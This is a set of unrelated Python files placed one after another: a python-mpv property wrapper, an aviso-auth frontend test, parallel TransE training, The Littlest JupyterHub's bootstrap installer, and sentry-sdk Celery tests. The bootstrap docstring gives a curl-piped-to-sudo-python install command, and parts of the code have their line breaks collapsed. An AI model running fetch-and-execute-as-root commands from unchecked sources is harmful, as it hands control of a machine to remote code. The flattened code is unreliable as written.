        out = cast(create_string_buffer(sizeof(c_void_p)), c_void_p)
        outptr = byref(out)
        try:
            cval = _mpv_get_property(self.handle, name.encode('utf-8'), fmt, outptr)
            rv = MpvNode.node_cast_value(outptr, fmt, decode_str or proptype in (str, commalist))
            if proptype is commalist:
                rv = proptype(rv)
            if proptype is str:
                _mpv_free(out)
            elif proptype is MpvFormat.NODE:
                _mpv_free_node_contents(outptr)
            return rv
        except PropertyUnavailableError as ex:
            # Unavailable properties read as None rather than raising.
            return None

    def _set_property(self, name, value, proptype=str):
        # All settable types funnel through the string setter; booleans map to
        # mpv's yes/no, bytes pass through untouched.
        ename = name.encode('utf-8')
        if type(value) is bytes:
            _mpv_set_property_string(self.handle, ename, value)
        elif type(value) is bool:
            _mpv_set_property_string(self.handle, ename, b'yes' if value else b'no')
        elif proptype in (str, int, float):
            _mpv_set_property_string(self.handle, ename, str(proptype(value)).encode('utf-8'))
        else:
            raise TypeError('Cannot set {} property {} to value of type {}'.format(proptype, name, type(value)))

    # Dict-like option access
    def __getitem__(self, name, file_local=False):
        """ Get an option value """
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._get_property(prefix+name)

    def __setitem__(self, name, value, file_local=False):
        """ Get an option value """
        # NOTE(review): docstring says "Get" but this sets — copy/paste slip.
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._set_property(prefix+name, value)

    def __iter__(self):
        return iter(self.options)

    def option_info(self, name):
        return self._get_property('option-info/'+name)


def commalist(propval=''):
    # Parse mpv's comma-separated list properties into a Python list.
    return str(propval).split(',')

node = MpvFormat.NODE

# Registry of known mpv properties: name -> (python type, access flags).
# Used by _event_loop/MpvEventProperty to coerce observed values. The dict
# continues past the end of this chunk.
ALL_PROPERTIES = {
        'osd-level':                    (int,    'rw'),
        'osd-scale':                    (float,  'rw'),
        'loop':                         (str,    'rw'),
        'loop-file':                    (str,    'rw'),
        'speed':                        (float,  'rw'),
        'filename':                     (bytes,  'r'),
        'file-size':                    (int,    'r'),
        'path':                         (bytes,  'r'),
        'media-title':                  (bytes,  'r'),
        'stream-pos':                   (int,    'rw'),
        'stream-end':                   (int,    'r'),
        'length':                       (float,  'r'), # deprecated for ages now
        'duration':                     (float,  'r'),
        'avsync':                       (float,  'r'),
        'total-avsync-change':          (float,  'r'),
        'drop-frame-count':             (int,    'r'),
        'percent-pos':                  (float,  'rw'),
#        'ratio-pos':                    (float,  'rw'),
        'time-pos':                     (float,  'rw'),
        'time-start':                   (float,  'r'),
        'time-remaining':               (float,  'r'),
        'playtime-remaining':           (float,  'r'),
        'chapter':                      (int,    'rw'),
        'edition':                      (int,    'rw'),
        'disc-titles':                  (int,    'r'),
        'disc-title':                   (str,    'rw'),
#        'disc-menu-active':             (bool,   'r'),
        'chapters':                     (int,    'r'),
        'editions':                     (int,    'r'),
        'angle':                        (int,    'rw'),
        'pause':                        (bool,   'rw'),
        'core-idle':                    (bool,   'r'),
        'cache':                        (int,    'r'),
        'cache-size':                   (int,    'rw'),
        'cache-free':                   (int,    'r'),
        'cache-used':                   (int,    'r'),
        'cache-speed':                  (int,    'r'),
        'cache-idle':                   (bool,   'r'),
        'cache-buffering-state':        (int,    'r'),
        'paused-for-cache':             (bool,   'r'),
#        'pause-for-cache':              (bool,   'r'),
        'eof-reached':                  (bool,   'r'),
#        'pts-association-mode':         (str,    'rw'),
        'hr-seek':                      (str,    'rw'),
        'volume':                       (float,  'rw'),
        'volume-max':                   (int,    'rw'),
        'ao-volume':                    (float,  'rw'),
        'mute':                         (bool,   'rw'),
        'ao-mute':                      (bool,   'rw'),
        'audio-speed-correction':       (float,  'r'),
        'audio-delay':                  (float,  'rw'),
        'audio-format':                 (str,    'r'),
        'audio-codec':                  (str,    'r'),
        'audio-codec-name':             (str,    'r'),
        'audio-bitrate':                (float,  'r'),
        'packet-audio-bitrate':         (float,  'r'),
        'audio-samplerate':             (int,    'r'),
        'audio-channels':               (str,    'r'),
        'aid':                          (str,    'rw'),
        'audio':                        (str,    'rw'), # alias for aid
        'balance':                      (int,    'rw'),
        'fullscreen':                   (bool,   'rw'),
        'deinterlace':                  (str,    'rw'),
        'colormatrix':                  (str,    'rw'),
        'colormatrix-input-range':      (str,    'rw'),
#        'colormatrix-output-range':     (str,    'rw'),
        'colormatrix-primaries':        (str,    'rw'),
        'ontop':                        (bool,   'rw'),
        'border':                       (bool,   'rw'),
        'framedrop':                    (str,    'rw'),
        'gamma':                        (float,  'rw'),
        'brightness':                   (int,    'rw'),
        'contrast':                     (int,    'rw'),
        'saturation':                   (int,    'rw'),
        'hue':                          (int,    'rw'),
        'hwdec':                        (str,    'rw'),
        'panscan':                      (float,  'rw'),
        'video-format':                 (str,    'r'),
        'video-codec':                  (str,    'r'),
        'video-bitrate':                (float,  'r'),
        'packet-video-bitrate':         (float,  'r'),
        'width':                        (int,    'r'),
        'height':                       (int,    'r'),
        'dwidth':                       (int,    'r'),
        'dheight':                      (int,    'r'),
        'fps':                          (float,  'r'),
        'estimated-vf-fps':             (float,  'r'),
        'window-scale':                 (float,  'rw'),
        'video-aspect':                 (str,    'rw'),
        'osd-width':                    (int,    'r'),
        'osd-height':                   (int,    'r'),
        'osd-par':                      (float,  'r'),
        'vid':                          (str,    'rw'),
        'video':                        (str,    'rw'), # alias for vid
        'video-align-x':                (float,  'rw'),
        'video-align-y':                (float,  'rw'),
        'video-pan-x':                  (float,  'rw'),
        'video-pan-y':                  (float,  'rw'),
        'video-zoom':                   (float,  'rw'),
        'video-unscaled':               (bool,   'w'),
        'video-speed-correction':       (float,  'r'),
        'program':                      (int,    'w'),
        'sid':                          (str,    'rw'),
        'sub':                          (str,    'rw'), # alias for sid
        'secondary-sid':                (str,    'rw'),
        'sub-delay':                    (float,  'rw'),
        'sub-pos':                      (int,    'rw'),
        'sub-visibility':               (bool,   'rw'),
        'sub-forced-only':              (bool,   'rw'),
        'sub-scale':                    (float,  'rw'),
        'sub-bitrate':                  (float,  'r'),
        'packet-sub-bitrate':           (float,  'r'),
#        'ass-use-margins':              (bool,   'rw'),
        'ass-vsfilter-aspect-compat':   (bool,   'rw'),
        'ass-style-override':           (bool,   'rw'),
        'stream-capture':               (str,    'rw'),
        'tv-brightness':                (int,    'rw'),
        'tv-contrast':                  (int,    'rw'),
        'tv-saturation':                (int,    'rw'),
        'tv-hue':                       (int,    'rw'),
        'playlist-pos':                 (int,    'rw'),
        'playlist-pos-1':               (int,    'rw'), # ugh.
        'playlist-count':               (int,    'r'),
#        'quvi-format':                  (str,    'rw'),
        'seekable':                     (bool,   'r'),
        'seeking':                      (bool,   'r'),
        'partially-seekable':           (bool,   'r'),
        'playback-abort':               (bool,   'r'),
        'cursor-autohide':              (str,    'rw'),
        'audio-device':                 (str,    'rw'),
        'current-vo':                   (str,    'r'),
        'current-ao':                   (str,    'r'),
        'audio-out-detected-device':    (str,    'r'),
        'protocol-list':                (str,    'r'),
        'mpv-version':                  (str,    'r'),
        'mpv-configuration':            (str,    'r'),
        'ffmpeg-version':               (str,    'r'),
        'display-sync-active':          (bool,   'r'),
        'stream-open-filename':         (bytes,  'rw'), # Undocumented
        'file-format':                  (commalist,'r'), # Be careful with this one.
'mistimed-frame-count': (int, 'r'), 'vsync-ratio': (float, 'r'), 'vo-drop-frame-count': (int, 'r'), 'vo-delayed-frame-count': (int, 'r'), 'playback-time': (float, 'rw'), 'demuxer-cache-duration': (float, 'r'), 'demuxer-cache-time': (float, 'r'), 'demuxer-cache-idle': (bool, 'r'), 'idle': (bool, 'r'), 'disc-title-list': (commalist,'r'), 'field-dominance': (str, 'rw'), 'taskbar-progress': (bool, 'rw'), 'on-all-workspaces': (bool, 'rw'), 'video-output-levels': (str, 'r'), 'vo-configured': (bool, 'r'), 'hwdec-current': (str, 'r'), 'hwdec-interop': (str, 'r'), 'estimated-frame-count': (int, 'r'), 'estimated-frame-number': (int, 'r'), 'sub-use-margins': (bool, 'rw'), 'ass-force-margins': (bool, 'rw'), 'video-rotate': (str, 'rw'), 'video-stereo-mode': (str, 'rw'), 'ab-loop-a': (str, 'r'), # What a mess... 'ab-loop-b': (str, 'r'), 'dvb-channel': (str, 'w'), 'dvb-channel-name': (str, 'rw'), 'window-minimized': (bool, 'r'), 'display-names': (commalist, 'r'), 'display-fps': (float, 'r'), # access apparently misdocumented in the manpage 'estimated-display-fps': (float, 'r'), 'vsync-jitter': (float, 'r'), 'video-params': (node, 'r', True), 'video-out-params': (node, 'r', True), 'track-list': (node, 'r', False), 'playlist': (node, 'r', False), 'chapter-list': (node, 'r', False), 'vo-performance': (node, 'r', True), 'filtered-metadata': (node, 'r', False), 'metadata': (node, 'r', False), 'chapter-metadata': (node, 'r', False), 'vf-metadata': (node, 'r', False), 'af-metadata': (node, 'r', False), 'edition-list': (node, 'r', False), 'disc-titles': (node, 'r', False), 'audio-params': (node, 'r', True), 'audio-out-params': (node, 'r', True), 'audio-device-list': (node, 'r', True), 'video-frame-info': (node, 'r', True), 'decoder-list': (node, 'r', True), 'encoder-list': (node, 'r', True), 'vf': (node, 'r', True), 'af': (node, 'r', True), 'options': (node, 'r', True), 'file-local-options': (node, 'r', True), 'property-list': (commalist,'r')} def bindproperty(MPV, name, proptype, 
access, decode_str=False): getter = lambda self: self._get_property(name, proptype, decode_str) setter = lambda self, value: self._set_property(name, value, proptype) def barf(*args): raise NotImplementedError('Access denied') setattr(MPV, name.replace('-', '_'), property(getter if 'r' in access else barf, setter if 'w' in access else barf)) for name, (proptype, access, *args) in ALL_PROPERTIES.items(): bindproperty(MPV, name, proptype, access, *args)
test_frontend_no_authoriser.py
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.

"""End-to-end test of the aviso-auth frontend against a broken authoriser.

A real Frontend is started in a background thread and pointed at a mock
authorisation server (a local Flask app) that always returns HTTP 500;
the test then checks the frontend degrades to a 503 for the client.
"""

import os
import threading
import time

import pytest
import requests
import yaml
from aviso_auth import config, logger
from aviso_auth.authorisation import Authoriser
from aviso_auth.frontend import Frontend
from flask import Flask
from werkzeug.exceptions import InternalServerError


def conf() -> config.Config:
    # this automatically configures the logging
    c = config.Config(conf_path=os.path.expanduser("~/.aviso-auth/testing/config.yaml"))
    # point the frontend at the local mock authoriser started below
    c.authorisation_server["url"] = "http://127.0.0.1:8021"
    c.frontend["port"] = 8082
    return c


# Module-level so both the fixture and the tests address the same frontend.
configuration = conf()
frontend_url = (
    f"http://{configuration.frontend['host']}:{configuration.frontend['port']}{configuration.backend['route']}"
)


def valid_token() -> str:
    # token is read from the local testing credentials file
    with open(os.path.expanduser("~/.aviso-auth/testing/credentials.yaml"), "r") as f:
        c = yaml.load(f.read(), Loader=yaml.Loader)
        return c["token"]


def valid_email() -> str:
    # email is read from the local testing credentials file
    with open(os.path.expanduser("~/.aviso-auth/testing/credentials.yaml"), "r") as f:
        c = yaml.load(f.read(), Loader=yaml.Loader)
        return c["email"]


# mock authoriser: every request to its root path yields an internal error
mock_authoriser = Flask("Authoriser")


@mock_authoriser.route("/", methods=["GET"])
def error():
    return InternalServerError("Test Error")


@pytest.fixture(scope="module", autouse=True)
def prepost_module():
    # Run the frontend at global level so it will be executed once and
    # accessible to all tests
    frontend = Frontend(configuration)
    server = threading.Thread(target=frontend.run_server, daemon=True)
    server.start()
    time.sleep(1)  # give the server thread time to bind its port

    # Run the mock authoriser
    authoriser = threading.Thread(
        target=mock_authoriser.run, daemon=True, kwargs={"host": "127.0.0.1", "port": 8021})
    authoriser.start()
    time.sleep(1)
    yield


def test_broken_authoriser():
    # log which test is running (pytest exposes it via this env variable)
    logger.debug(os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0])
    key = "/ec/diss/SCL"
    # encode key
    encoded_key = Authoriser._encode_to_str_base64(key)
    range_end = Authoriser._encode_to_str_base64(str(Authoriser._incr_last_byte(key), "utf-8"))
    # create the body for the get range on the etcd server
    body = {
        "key": encoded_key,
        "range_end": range_end,
        "limit": 100,
        "sort_order": "DESCEND",
        "sort_target": "KEY",
        "keys_only": False,
        "revision": None,
        "min_mod_revision": None,
        "max_mod_revision": None,
    }
    # make the call
    resp = requests.post(
        frontend_url,
        json=body,
        headers={"Authorization": f"EmailKey {valid_email()}:{valid_token()}"},
        timeout=configuration.backend["req_timeout"],
    )
    # the authoriser always 500s, so the frontend must answer 503
    assert resp.status_code == 503
main_parallel.py
"""Hogwild-style parallel training of a TransE knowledge-graph embedding model.

A single model is placed in shared memory and trained by several worker
processes per epoch; after the workers join, tail-prediction hit@k accuracy
is evaluated on the test set.
"""
import pdb
import torch
from torch import optim, nn
from torch.utils.data import Dataset, DataLoader
from load import Mapping
from model import TransE
from prepare_data import TrainSet, TestSet
import os
import torch.multiprocessing as mp

device = torch.device('cpu')
train_batch_size = 32
test_batch_size = 256
num_epochs = 50
top_k = 10  # k for hit@k tail prediction

# Datasets/loaders are module-level so worker processes inherit them.
train_dataset = TrainSet()
test_dataset = TestSet()
test_dataset.convert_word_to_index(train_dataset.entity_to_index,
                                   train_dataset.relation_to_index,
                                   test_dataset.raw_data)
train_loader = DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True)
test_loader = DataLoader(test_dataset, batch_size=test_batch_size, shuffle=True)


def train(model, epoch):
    """Run one pass over train_loader, updating the shared-memory model.

    `epoch` is currently unused but kept so the mp.Process target signature
    stays stable for callers.
    """
    total_loss = 0
    for batch_idx, (pos, neg) in enumerate(train_loader):
        pos, neg = pos.to(device), neg.to(device)
        # transpose to (columns, batch) so the triple components unpack
        # positionally into the model's forward signature
        pos = torch.transpose(pos, 0, 1)
        neg = torch.transpose(neg, 0, 1)
        loss = model(*pos, *neg)
        total_loss += loss.item()
        model.optimize(loss)


def main():
    """Train for num_epochs, spawning 8 Hogwild workers per epoch, then eval."""
    model = TransE(train_dataset.entity_num, train_dataset.relation_num, device)
    # share parameters so all worker processes update the same tensors
    model.share_memory()
    for epoch in range(num_epochs):
        model.normalize()
        processes = []
        num_processes = 8
        for rank in range(num_processes):
            p = mp.Process(target=train, args=(model, epoch))
            p.start()
            processes.append(p)
        for p in processes:
            p.join()

        # Evaluate hit@top_k tail prediction on the test set.
        # NOTE(review): evaluation is not wrapped in torch.no_grad();
        # presumably tail_predict does not need gradients — confirm.
        correct_test = 0
        for batch_idx, data in enumerate(test_loader):
            data = data.to(device)
            data = torch.transpose(data, 0, 1)
            correct_test += model.tail_predict(data[0], data[1], data[2], k=top_k)
        print(f"===>epoch {epoch+1}, test accuracy {correct_test/len(test_dataset)}")


if __name__ == "__main__":
    main()
bootstrap.py
""" Bootstrap an installation of TLJH. Sets up just enough TLJH environments to invoke tljh.installer. This script is run as: curl <script-url> | sudo python3 - Constraints: - Entire script should be compatible with Python 3.6 (We run on Ubuntu 18.04+) - Script should parse in Python 3.4 (since we exit with useful error message on Ubuntu 14.04+) - Use stdlib modules only """ import os from http.server import SimpleHTTPRequestHandler, HTTPServer import multiprocessing import subprocess import sys import logging import shutil import urllib.request html = """ <html> <head> <title>The Littlest Jupyterhub</title> </head> <body> <meta http-equiv="refresh" content="30" > <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width"> <img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/master/docs/images/logo/logo.png"> <div class="loader center"></div> <div class="center main-msg">Please wait while your TLJH is building...</div> <div class="center logs-msg">Click the button below to see the logs</div> <div class="center tip" >Tip: to update the logs, refresh the page</div> <button class="logs-button center" onclick="window.location.href='/logs'">View logs</button> </body> <style> button:hover { background: grey; } .logo { width: 150px; height: auto; } .center { margin: 0 auto; margin-top: 50px; text-align:center; display: block; } .main-msg { font-size: 30px; font-weight: bold; color: grey; text-align:center; } .logs-msg { font-size: 15px; color: grey; } .tip { font-size: 13px; color: grey; margin-top: 10px; font-style: italic; } .logs-button { margin-top:15px; border: 0; color: white; padding: 15px 32px; font-size: 16px; cursor: pointer; background: #f5a252; } .loader { width: 150px; height: 150px; border-radius: 90%; border: 7px solid transparent; animation: spin 2s infinite ease; animation-direction: alternate; } @keyframes spin { 0% { transform: rotateZ(0deg); 
border-top-color: #f17c0e } 100% { transform: rotateZ(360deg); border-top-color: #fce5cf; } } </style> </head> </html> """ logger = logging.getLogger(__name__) def get_os_release_variable(key): """ Return value for key from /etc/os-release /etc/os-release is a bash file, so should use bash to parse it. Returns empty string if key is not found. """ return subprocess.check_output([ '/bin/bash', '-c', "source /etc/os-release && echo ${{{key}}}".format(key=key) ]).decode().strip() # Copied into tljh/utils.py. Make sure the copies are exactly the same! def run_subprocess(cmd, *args, **kwargs): """ Run given cmd with smart output behavior. If command succeeds, print output to debug logging. If it fails, print output to info logging. In TLJH, this sends successful output to the installer log, and failed output directly to the user's screen """ logger = logging.getLogger('tljh') proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs) printable_command = ' '.join(cmd) if proc.returncode != 0: # Our process failed! Show output to the user logger.error('Ran {command} with exit code {code}'.format( command=printable_command, code=proc.returncode )) logger.error(proc.stdout.decode()) raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode) else: # This goes into installer.log logger.debug('Ran {command} with exit code {code}'.format( command=printable_command, code=proc.returncode )) # This produces multi line log output, unfortunately. Not sure how to fix. # For now, prioritizing human readability over machine readability. 
logger.debug(proc.stdout.decode()) def validate_host(): """ Make sure TLJH is installable in current host """ # Support only Ubuntu 18.04+ distro = get_os_release_variable('ID') version = float(get_os_release_variable('VERSION_ID')) if distro != 'ubuntu': print('The Littlest JupyterHub currently supports Ubuntu Linux only') sys.exit(1) elif float(version) < 18.04: print('The Littlest JupyterHub requires Ubuntu 18.04 or higher') sys.exit(1) if sys.version_info < (3, 5): print("bootstrap.py must be run with at least Python 3.5") sys.exit(1) if not (shutil.which('systemd') and shutil.which('systemctl')): print("Systemd is required to run TLJH") # Only fail running inside docker if systemd isn't present if os.path.exists('/.dockerenv'): print("Running inside a docker container without systemd isn't supported") print("We recommend against running a production TLJH instance inside a docker container") print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html") sys.exit(1) class LoaderPageRequestHandler(SimpleHTTPRequestHandler): def do_GET(self): if self.path == "/logs": with open("/opt/tljh/installer.log", "r") as log_file: logs = log_file.read() self.send_response(200) self.send_header('Content-Type', 'text/plain; charset=utf-8') self.end_headers() self.wfile.write(logs.encode('utf-8')) elif self.path == "/index.html": self.path = "/var/run/index.html" return SimpleHTTPRequestHandler.do_GET(self) elif self.path == "/favicon.ico": self.path = "/var/run/favicon.ico" return SimpleHTTPRequestHandler.do_GET(self) elif self.path == "/": self.send_response(302) self.send_header('Location','/index.html') self.end_headers() else: SimpleHTTPRequestHandler.send_error(self, code=403) def serve_forever(server): try: server.serve_forever() except KeyboardInterrupt: pass def main(): flags = sys.argv[1:] temp_page_flag = "--show-progress-page" # Check for flag in the argv list. 
This doesn't use argparse # because it's the only argument that's meant for the boostrap script. # All the other flags will be passed to and parsed by the installer. if temp_page_flag in flags: with open("/var/run/index.html", "w+") as f: f.write(html) favicon_url="https://raw.githubusercontent.com/jupyterhub/jupyterhub/master/share/jupyterhub/static/favicon.ico" urllib.request.urlretrieve(favicon_url, "/var/run/favicon.ico") # If the bootstrap is run to upgrade TLJH, then this will raise an "Address already in use" error try: loading_page_server = HTTPServer(("", 80), LoaderPageRequestHandler) p = multiprocessing.Process(target=serve_forever, args=(loading_page_server,)) # Serves the loading page until TLJH builds p.start() # Remove the flag from the args list, since it was only relevant to this script. flags.remove("--show-progress-page") # Pass the server's pid as a flag to the istaller pid_flag = "--progress-page-server-pid" flags.extend([pid_flag, str(p.pid)]) except OSError: # Only serve the loading page when installing TLJH pass validate_host() install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh') hub_prefix = os.path.join(install_prefix, 'hub') # Set up logging to print to a file and to stderr os.makedirs(install_prefix, exist_ok=True) file_logger_path = os.path.join(install_prefix, 'installer.log') file_logger = logging.FileHandler(file_logger_path) # installer.log should be readable only by root os.chmod(file_logger_path, 0o500) file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s')) file_logger.setLevel(logging.DEBUG) logger.addHandler(file_logger) stderr_logger = logging.StreamHandler() stderr_logger.setFormatter(logging.Formatter('%(message)s')) stderr_logger.setLevel(logging.INFO) logger.addHandler(stderr_logger) logger.setLevel(logging.DEBUG) logger.info('Checking if TLJH is already installed...') if os.path.exists(os.path.join(hub_prefix, 'bin', 'python3')): logger.info('TLJH already installed, upgrading...') 
initial_setup = False else: logger.info('Setting up hub environment') initial_setup = True # Install software-properties-common, so we can get add-apt-repository # That helps us make sure the universe repository is enabled, since # that's where the python3-pip package lives. In some very minimal base # VM images, it looks like the universe repository is disabled by default, # causing bootstrapping to fail. run_subprocess(['apt-get', 'update', '--yes']) run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common']) run_subprocess(['add-apt-repository', 'universe']) run_subprocess(['apt-get', 'update', '--yes']) run_subprocess(['apt-get', 'install', '--yes', 'python3', 'python3-venv', 'python3-pip', 'git' ]) logger.info('Installed python & virtual environment') os.makedirs(hub_prefix, exist_ok=True) run_subprocess(['python3', '-m', 'venv', hub_prefix]) logger.info('Set up hub virtual environment') if initial_setup: logger.info('Setting up TLJH installer...') else: logger.info('Upgrading TLJH installer...') pip_flags = ['--upgrade'] if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes': pip_flags.append('--editable') tljh_repo_path = os.environ.get( 'TLJH_BOOTSTRAP_PIP_SPEC', 'git+https://github.com/underworld-geodynamics-cloud/the-littlest-jupyterhub.git' ) # Upgrade pip run_subprocess([ os.path.join(hub_prefix, 'bin', 'pip'), 'install', '--upgrade', 'pip==20.0.*' ]) logger.info('Upgraded pip') run_subprocess([ os.path.join(hub_prefix, 'bin', 'pip'), 'install' ] + pip_flags + [tljh_repo_path]) logger.info('Setup tljh package') logger.info('Starting TLJH installer...') os.execv( os.path.join(hub_prefix, 'bin', 'python3'), [ os.path.join(hub_prefix, 'bin', 'python3'), '-m', 'tljh.installer', ] + flags ) if __name__ == '__main__': main()
test_celery.py
"""Tests for the sentry-sdk Celery integration (error capture, tracing,
trace propagation, retries and worker shutdown), run against both Celery 3
and Celery 4+ code paths."""
import threading

import pytest

pytest.importorskip("celery")

from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk._compat import text_type

from celery import Celery, VERSION
from celery.bin import worker


@pytest.fixture
def connect_signal(request):
    # Connect a handler to a celery signal and disconnect it again at teardown.
    def inner(signal, f):
        signal.connect(f)
        request.addfinalizer(lambda: signal.disconnect(f))

    return inner


@pytest.fixture
def init_celery(sentry_init):
    # Build an eager Celery app with the sentry integration installed.
    def inner(propagate_traces=True, **kwargs):
        sentry_init(
            integrations=[CeleryIntegration(propagate_traces=propagate_traces)],
            **kwargs
        )
        celery = Celery(__name__)
        # config key spelling changed between Celery 3 and 4
        if VERSION < (4,):
            celery.conf.CELERY_ALWAYS_EAGER = True
        else:
            celery.conf.task_always_eager = True
        return celery

    return inner


@pytest.fixture
def celery(init_celery):
    return init_celery()


@pytest.fixture(
    params=[
        lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}),
        lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}),
        lambda task, x, y: (
            task.apply_async(args=(x, y)),
            {"args": [x, y], "kwargs": {}},
        ),
        lambda task, x, y: (
            task.apply_async(kwargs=dict(x=x, y=y)),
            {"args": [], "kwargs": {"x": x, "y": y}},
        ),
    ]
)
def celery_invocation(request):
    """
    Invokes a task in multiple ways Celery allows you to (testing our
    apply_async monkeypatch).

    Currently limited to a task signature of the form foo(x, y)
    """
    return request.param


def test_simple(capture_events, celery, celery_invocation):
    # A failing task produces exactly one error event carrying the celery
    # job context and the surrounding span's trace id.
    events = capture_events()

    @celery.task(name="dummy_task")
    def dummy_task(x, y):
        foo = 42  # noqa
        return x / y

    with Hub.current.start_span() as span:
        celery_invocation(dummy_task, 1, 2)
        _, expected_context = celery_invocation(dummy_task, 1, 0)

    event, = events

    assert event["contexts"]["trace"]["trace_id"] == span.trace_id
    assert event["contexts"]["trace"]["span_id"] != span.span_id
    assert event["transaction"] == "dummy_task"
    assert event["extra"]["celery-job"] == dict(
        task_name="dummy_task", **expected_context
    )

    exception, = event["exception"]["values"]
    assert exception["type"] == "ZeroDivisionError"
    assert exception["mechanism"]["type"] == "celery"
    assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"


@pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"])
def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails):
    celery = init_celery(traces_sample_rate=1.0)

    @celery.task(name="dummy_task")
    def dummy_task(x, y):
        return x / y

    # XXX: For some reason the first call does not get instrumented properly.
    celery_invocation(dummy_task, 1, 1)

    events = capture_events()

    with Hub.current.start_span(transaction="submission") as span:
        celery_invocation(dummy_task, 1, 0 if task_fails else 1)

    if task_fails:
        error_event = events.pop(0)
        assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id
        assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError"

    # one transaction for task execution, one for submission
    execution_event, submission_event = events

    assert execution_event["transaction"] == "dummy_task"
    assert submission_event["transaction"] == "submission"

    assert execution_event["type"] == submission_event["type"] == "transaction"
    assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id
    assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id

    if task_fails:
        assert execution_event["contexts"]["trace"]["status"] == "failure"
    else:
        assert "status" not in execution_event["contexts"]["trace"]

    assert execution_event["spans"] == []
    assert submission_event["spans"] == [
        {
            u"data": {},
            u"description": u"dummy_task",
            u"op": "celery.submit",
            u"parent_span_id": submission_event["contexts"]["trace"]["span_id"],
            u"same_process_as_parent": True,
            u"span_id": submission_event["spans"][0]["span_id"],
            u"start_timestamp": submission_event["spans"][0]["start_timestamp"],
            u"tags": {},
            u"timestamp": submission_event["spans"][0]["timestamp"],
            u"trace_id": text_type(span.trace_id),
        }
    ]


def test_no_stackoverflows(celery):
    """We used to have a bug in the Celery integration where its monkeypatching
    was repeated for every task invocation, leading to stackoverflows.

    See https://github.com/getsentry/sentry-python/issues/265
    """

    results = []

    @celery.task(name="dummy_task")
    def dummy_task():
        with configure_scope() as scope:
            scope.set_tag("foo", "bar")

        results.append(42)

    for _ in range(10000):
        dummy_task.delay()

    assert results == [42] * 10000

    # scope mutations inside the task must not leak into the outer scope
    with configure_scope() as scope:
        assert not scope._tags


def test_simple_no_propagation(capture_events, init_celery):
    # With propagate_traces=False the task's event gets its own trace id.
    celery = init_celery(propagate_traces=False)
    events = capture_events()

    @celery.task(name="dummy_task")
    def dummy_task():
        1 / 0

    with Hub.current.start_span() as span:
        dummy_task.delay()

    event, = events
    assert event["contexts"]["trace"]["trace_id"] != span.trace_id
    assert event["transaction"] == "dummy_task"

    exception, = event["exception"]["values"]
    assert exception["type"] == "ZeroDivisionError"


def test_ignore_expected(capture_events, celery):
    # Exceptions listed in the task's `throws` must not be reported.
    events = capture_events()

    @celery.task(name="dummy_task", throws=(ZeroDivisionError,))
    def dummy_task(x, y):
        return x / y

    dummy_task.delay(1, 2)
    dummy_task.delay(1, 0)
    assert not events


def test_broken_prerun(init_celery, connect_signal):
    # A crashing task_prerun handler must not corrupt the sentry scope stack.
    from celery.signals import task_prerun

    stack_lengths = []

    def crash(*args, **kwargs):
        # scope should exist in prerun
        stack_lengths.append(len(Hub.current._stack))
        1 / 0

    # Order here is important to reproduce the bug: In Celery 3, a crashing
    # prerun would prevent other preruns from running.
    connect_signal(task_prerun, crash)
    celery = init_celery()

    assert len(Hub.current._stack) == 1

    @celery.task(name="dummy_task")
    def dummy_task(x, y):
        stack_lengths.append(len(Hub.current._stack))
        return x / y

    if VERSION >= (4,):
        dummy_task.delay(2, 2)
    else:
        with pytest.raises(ZeroDivisionError):
            dummy_task.delay(2, 2)

    assert len(Hub.current._stack) == 1
    if VERSION < (4,):
        assert stack_lengths == [2]
    else:
        assert stack_lengths == [2, 2]


@pytest.mark.xfail(
    (4, 2, 0) <= VERSION,
    strict=True,
    reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
    # Retries that eventually succeed produce no event; exhausted retries
    # produce a single event with the chained ZeroDivisionErrors.
    events = capture_events()
    failures = [True, True, False]
    runs = []

    @celery.task(name="dummy_task", bind=True)
    def dummy_task(self):
        runs.append(1)
        try:
            if failures.pop(0):
                1 / 0
        except Exception as exc:
            self.retry(max_retries=2, exc=exc)

    dummy_task.delay()

    assert len(runs) == 3
    assert not events

    failures = [True, True, True]
    runs = []

    dummy_task.delay()

    assert len(runs) == 3
    event, = events
    exceptions = event["exception"]["values"]

    for e in exceptions:
        assert e["type"] == "ZeroDivisionError"


@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
    # Run a real (non-eager) worker in a thread and verify the event still
    # reaches the transport when worker child processes are recycled.
    events = capture_events_forksafe()

    celery.conf.worker_max_tasks_per_child = 1
    celery.conf.broker_url = "memory://localhost/"
    celery.conf.broker_backend = "memory"
    celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
    celery.conf.task_always_eager = False

    runs = []

    @celery.task(name="dummy_task", bind=True)
    def dummy_task(self):
        runs.append(1)
        1 / 0

    res = dummy_task.delay()

    w = worker.worker(app=celery)
    t = threading.Thread(target=w.run)
